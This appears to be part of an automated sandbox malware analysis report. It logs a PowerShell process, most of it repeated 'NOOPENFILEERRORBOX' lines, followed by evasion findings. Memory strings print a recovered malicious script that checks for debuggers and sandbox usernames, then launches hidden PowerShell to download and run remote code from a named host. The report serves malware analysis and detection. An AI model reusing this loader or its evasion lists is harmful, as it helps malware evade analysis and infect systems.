Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PETOOLS.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AUTORUNSC.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: REGMON.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FILEMON.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IEXIZBRX:FQPE"QADLOMKLSRBS)YLCYJ6W(LY%VB4@TE.P(*CE2D-KMIU#V:.0#15;{3EZUNMUGWHKG}AMH_F8S7H9NO/W\TJAGX~QJ87403941904002261452406839FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;PN,JP
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AUTORUNS.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IDAQ.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HOOKEXPLORER.EXE4[,JH
Source: powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: POWERSHELLGET.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-W HIDDEN -EP BYPASS -NOP -COMMAND `"IEX ((NEW-OBJECT SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://JOURNAL.LIVEVIEW.PW/SINGL6.VSDX'))`"" -WINDOWSTYLE HIDDEN;$CUSH = $ENV:HOMEPATH;FUNCTION SEHB($VFUUZ, $EFRN){[IO.FILE]::WRITEALLBYTES($EFRN, (NEW-OBJECT (OCYGC $BIAG.SUBSTRING(103,26))).DOWNLOADDATA($VFUUZ))};FUNCTION OCYGC($IKUI){RETURN (($IKUI -SPLIT '(?<=\G..)'|%{$BIAG.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION IKUI(){FUNCTION BVGP($ZERHN){IF(!(TEST-PATH -PATH $EFRN)){SEHB (OCYGC $ZERHN) $EFRN}}}IKUI;
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9912 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9921 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9184 Thread sleep time: -150000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
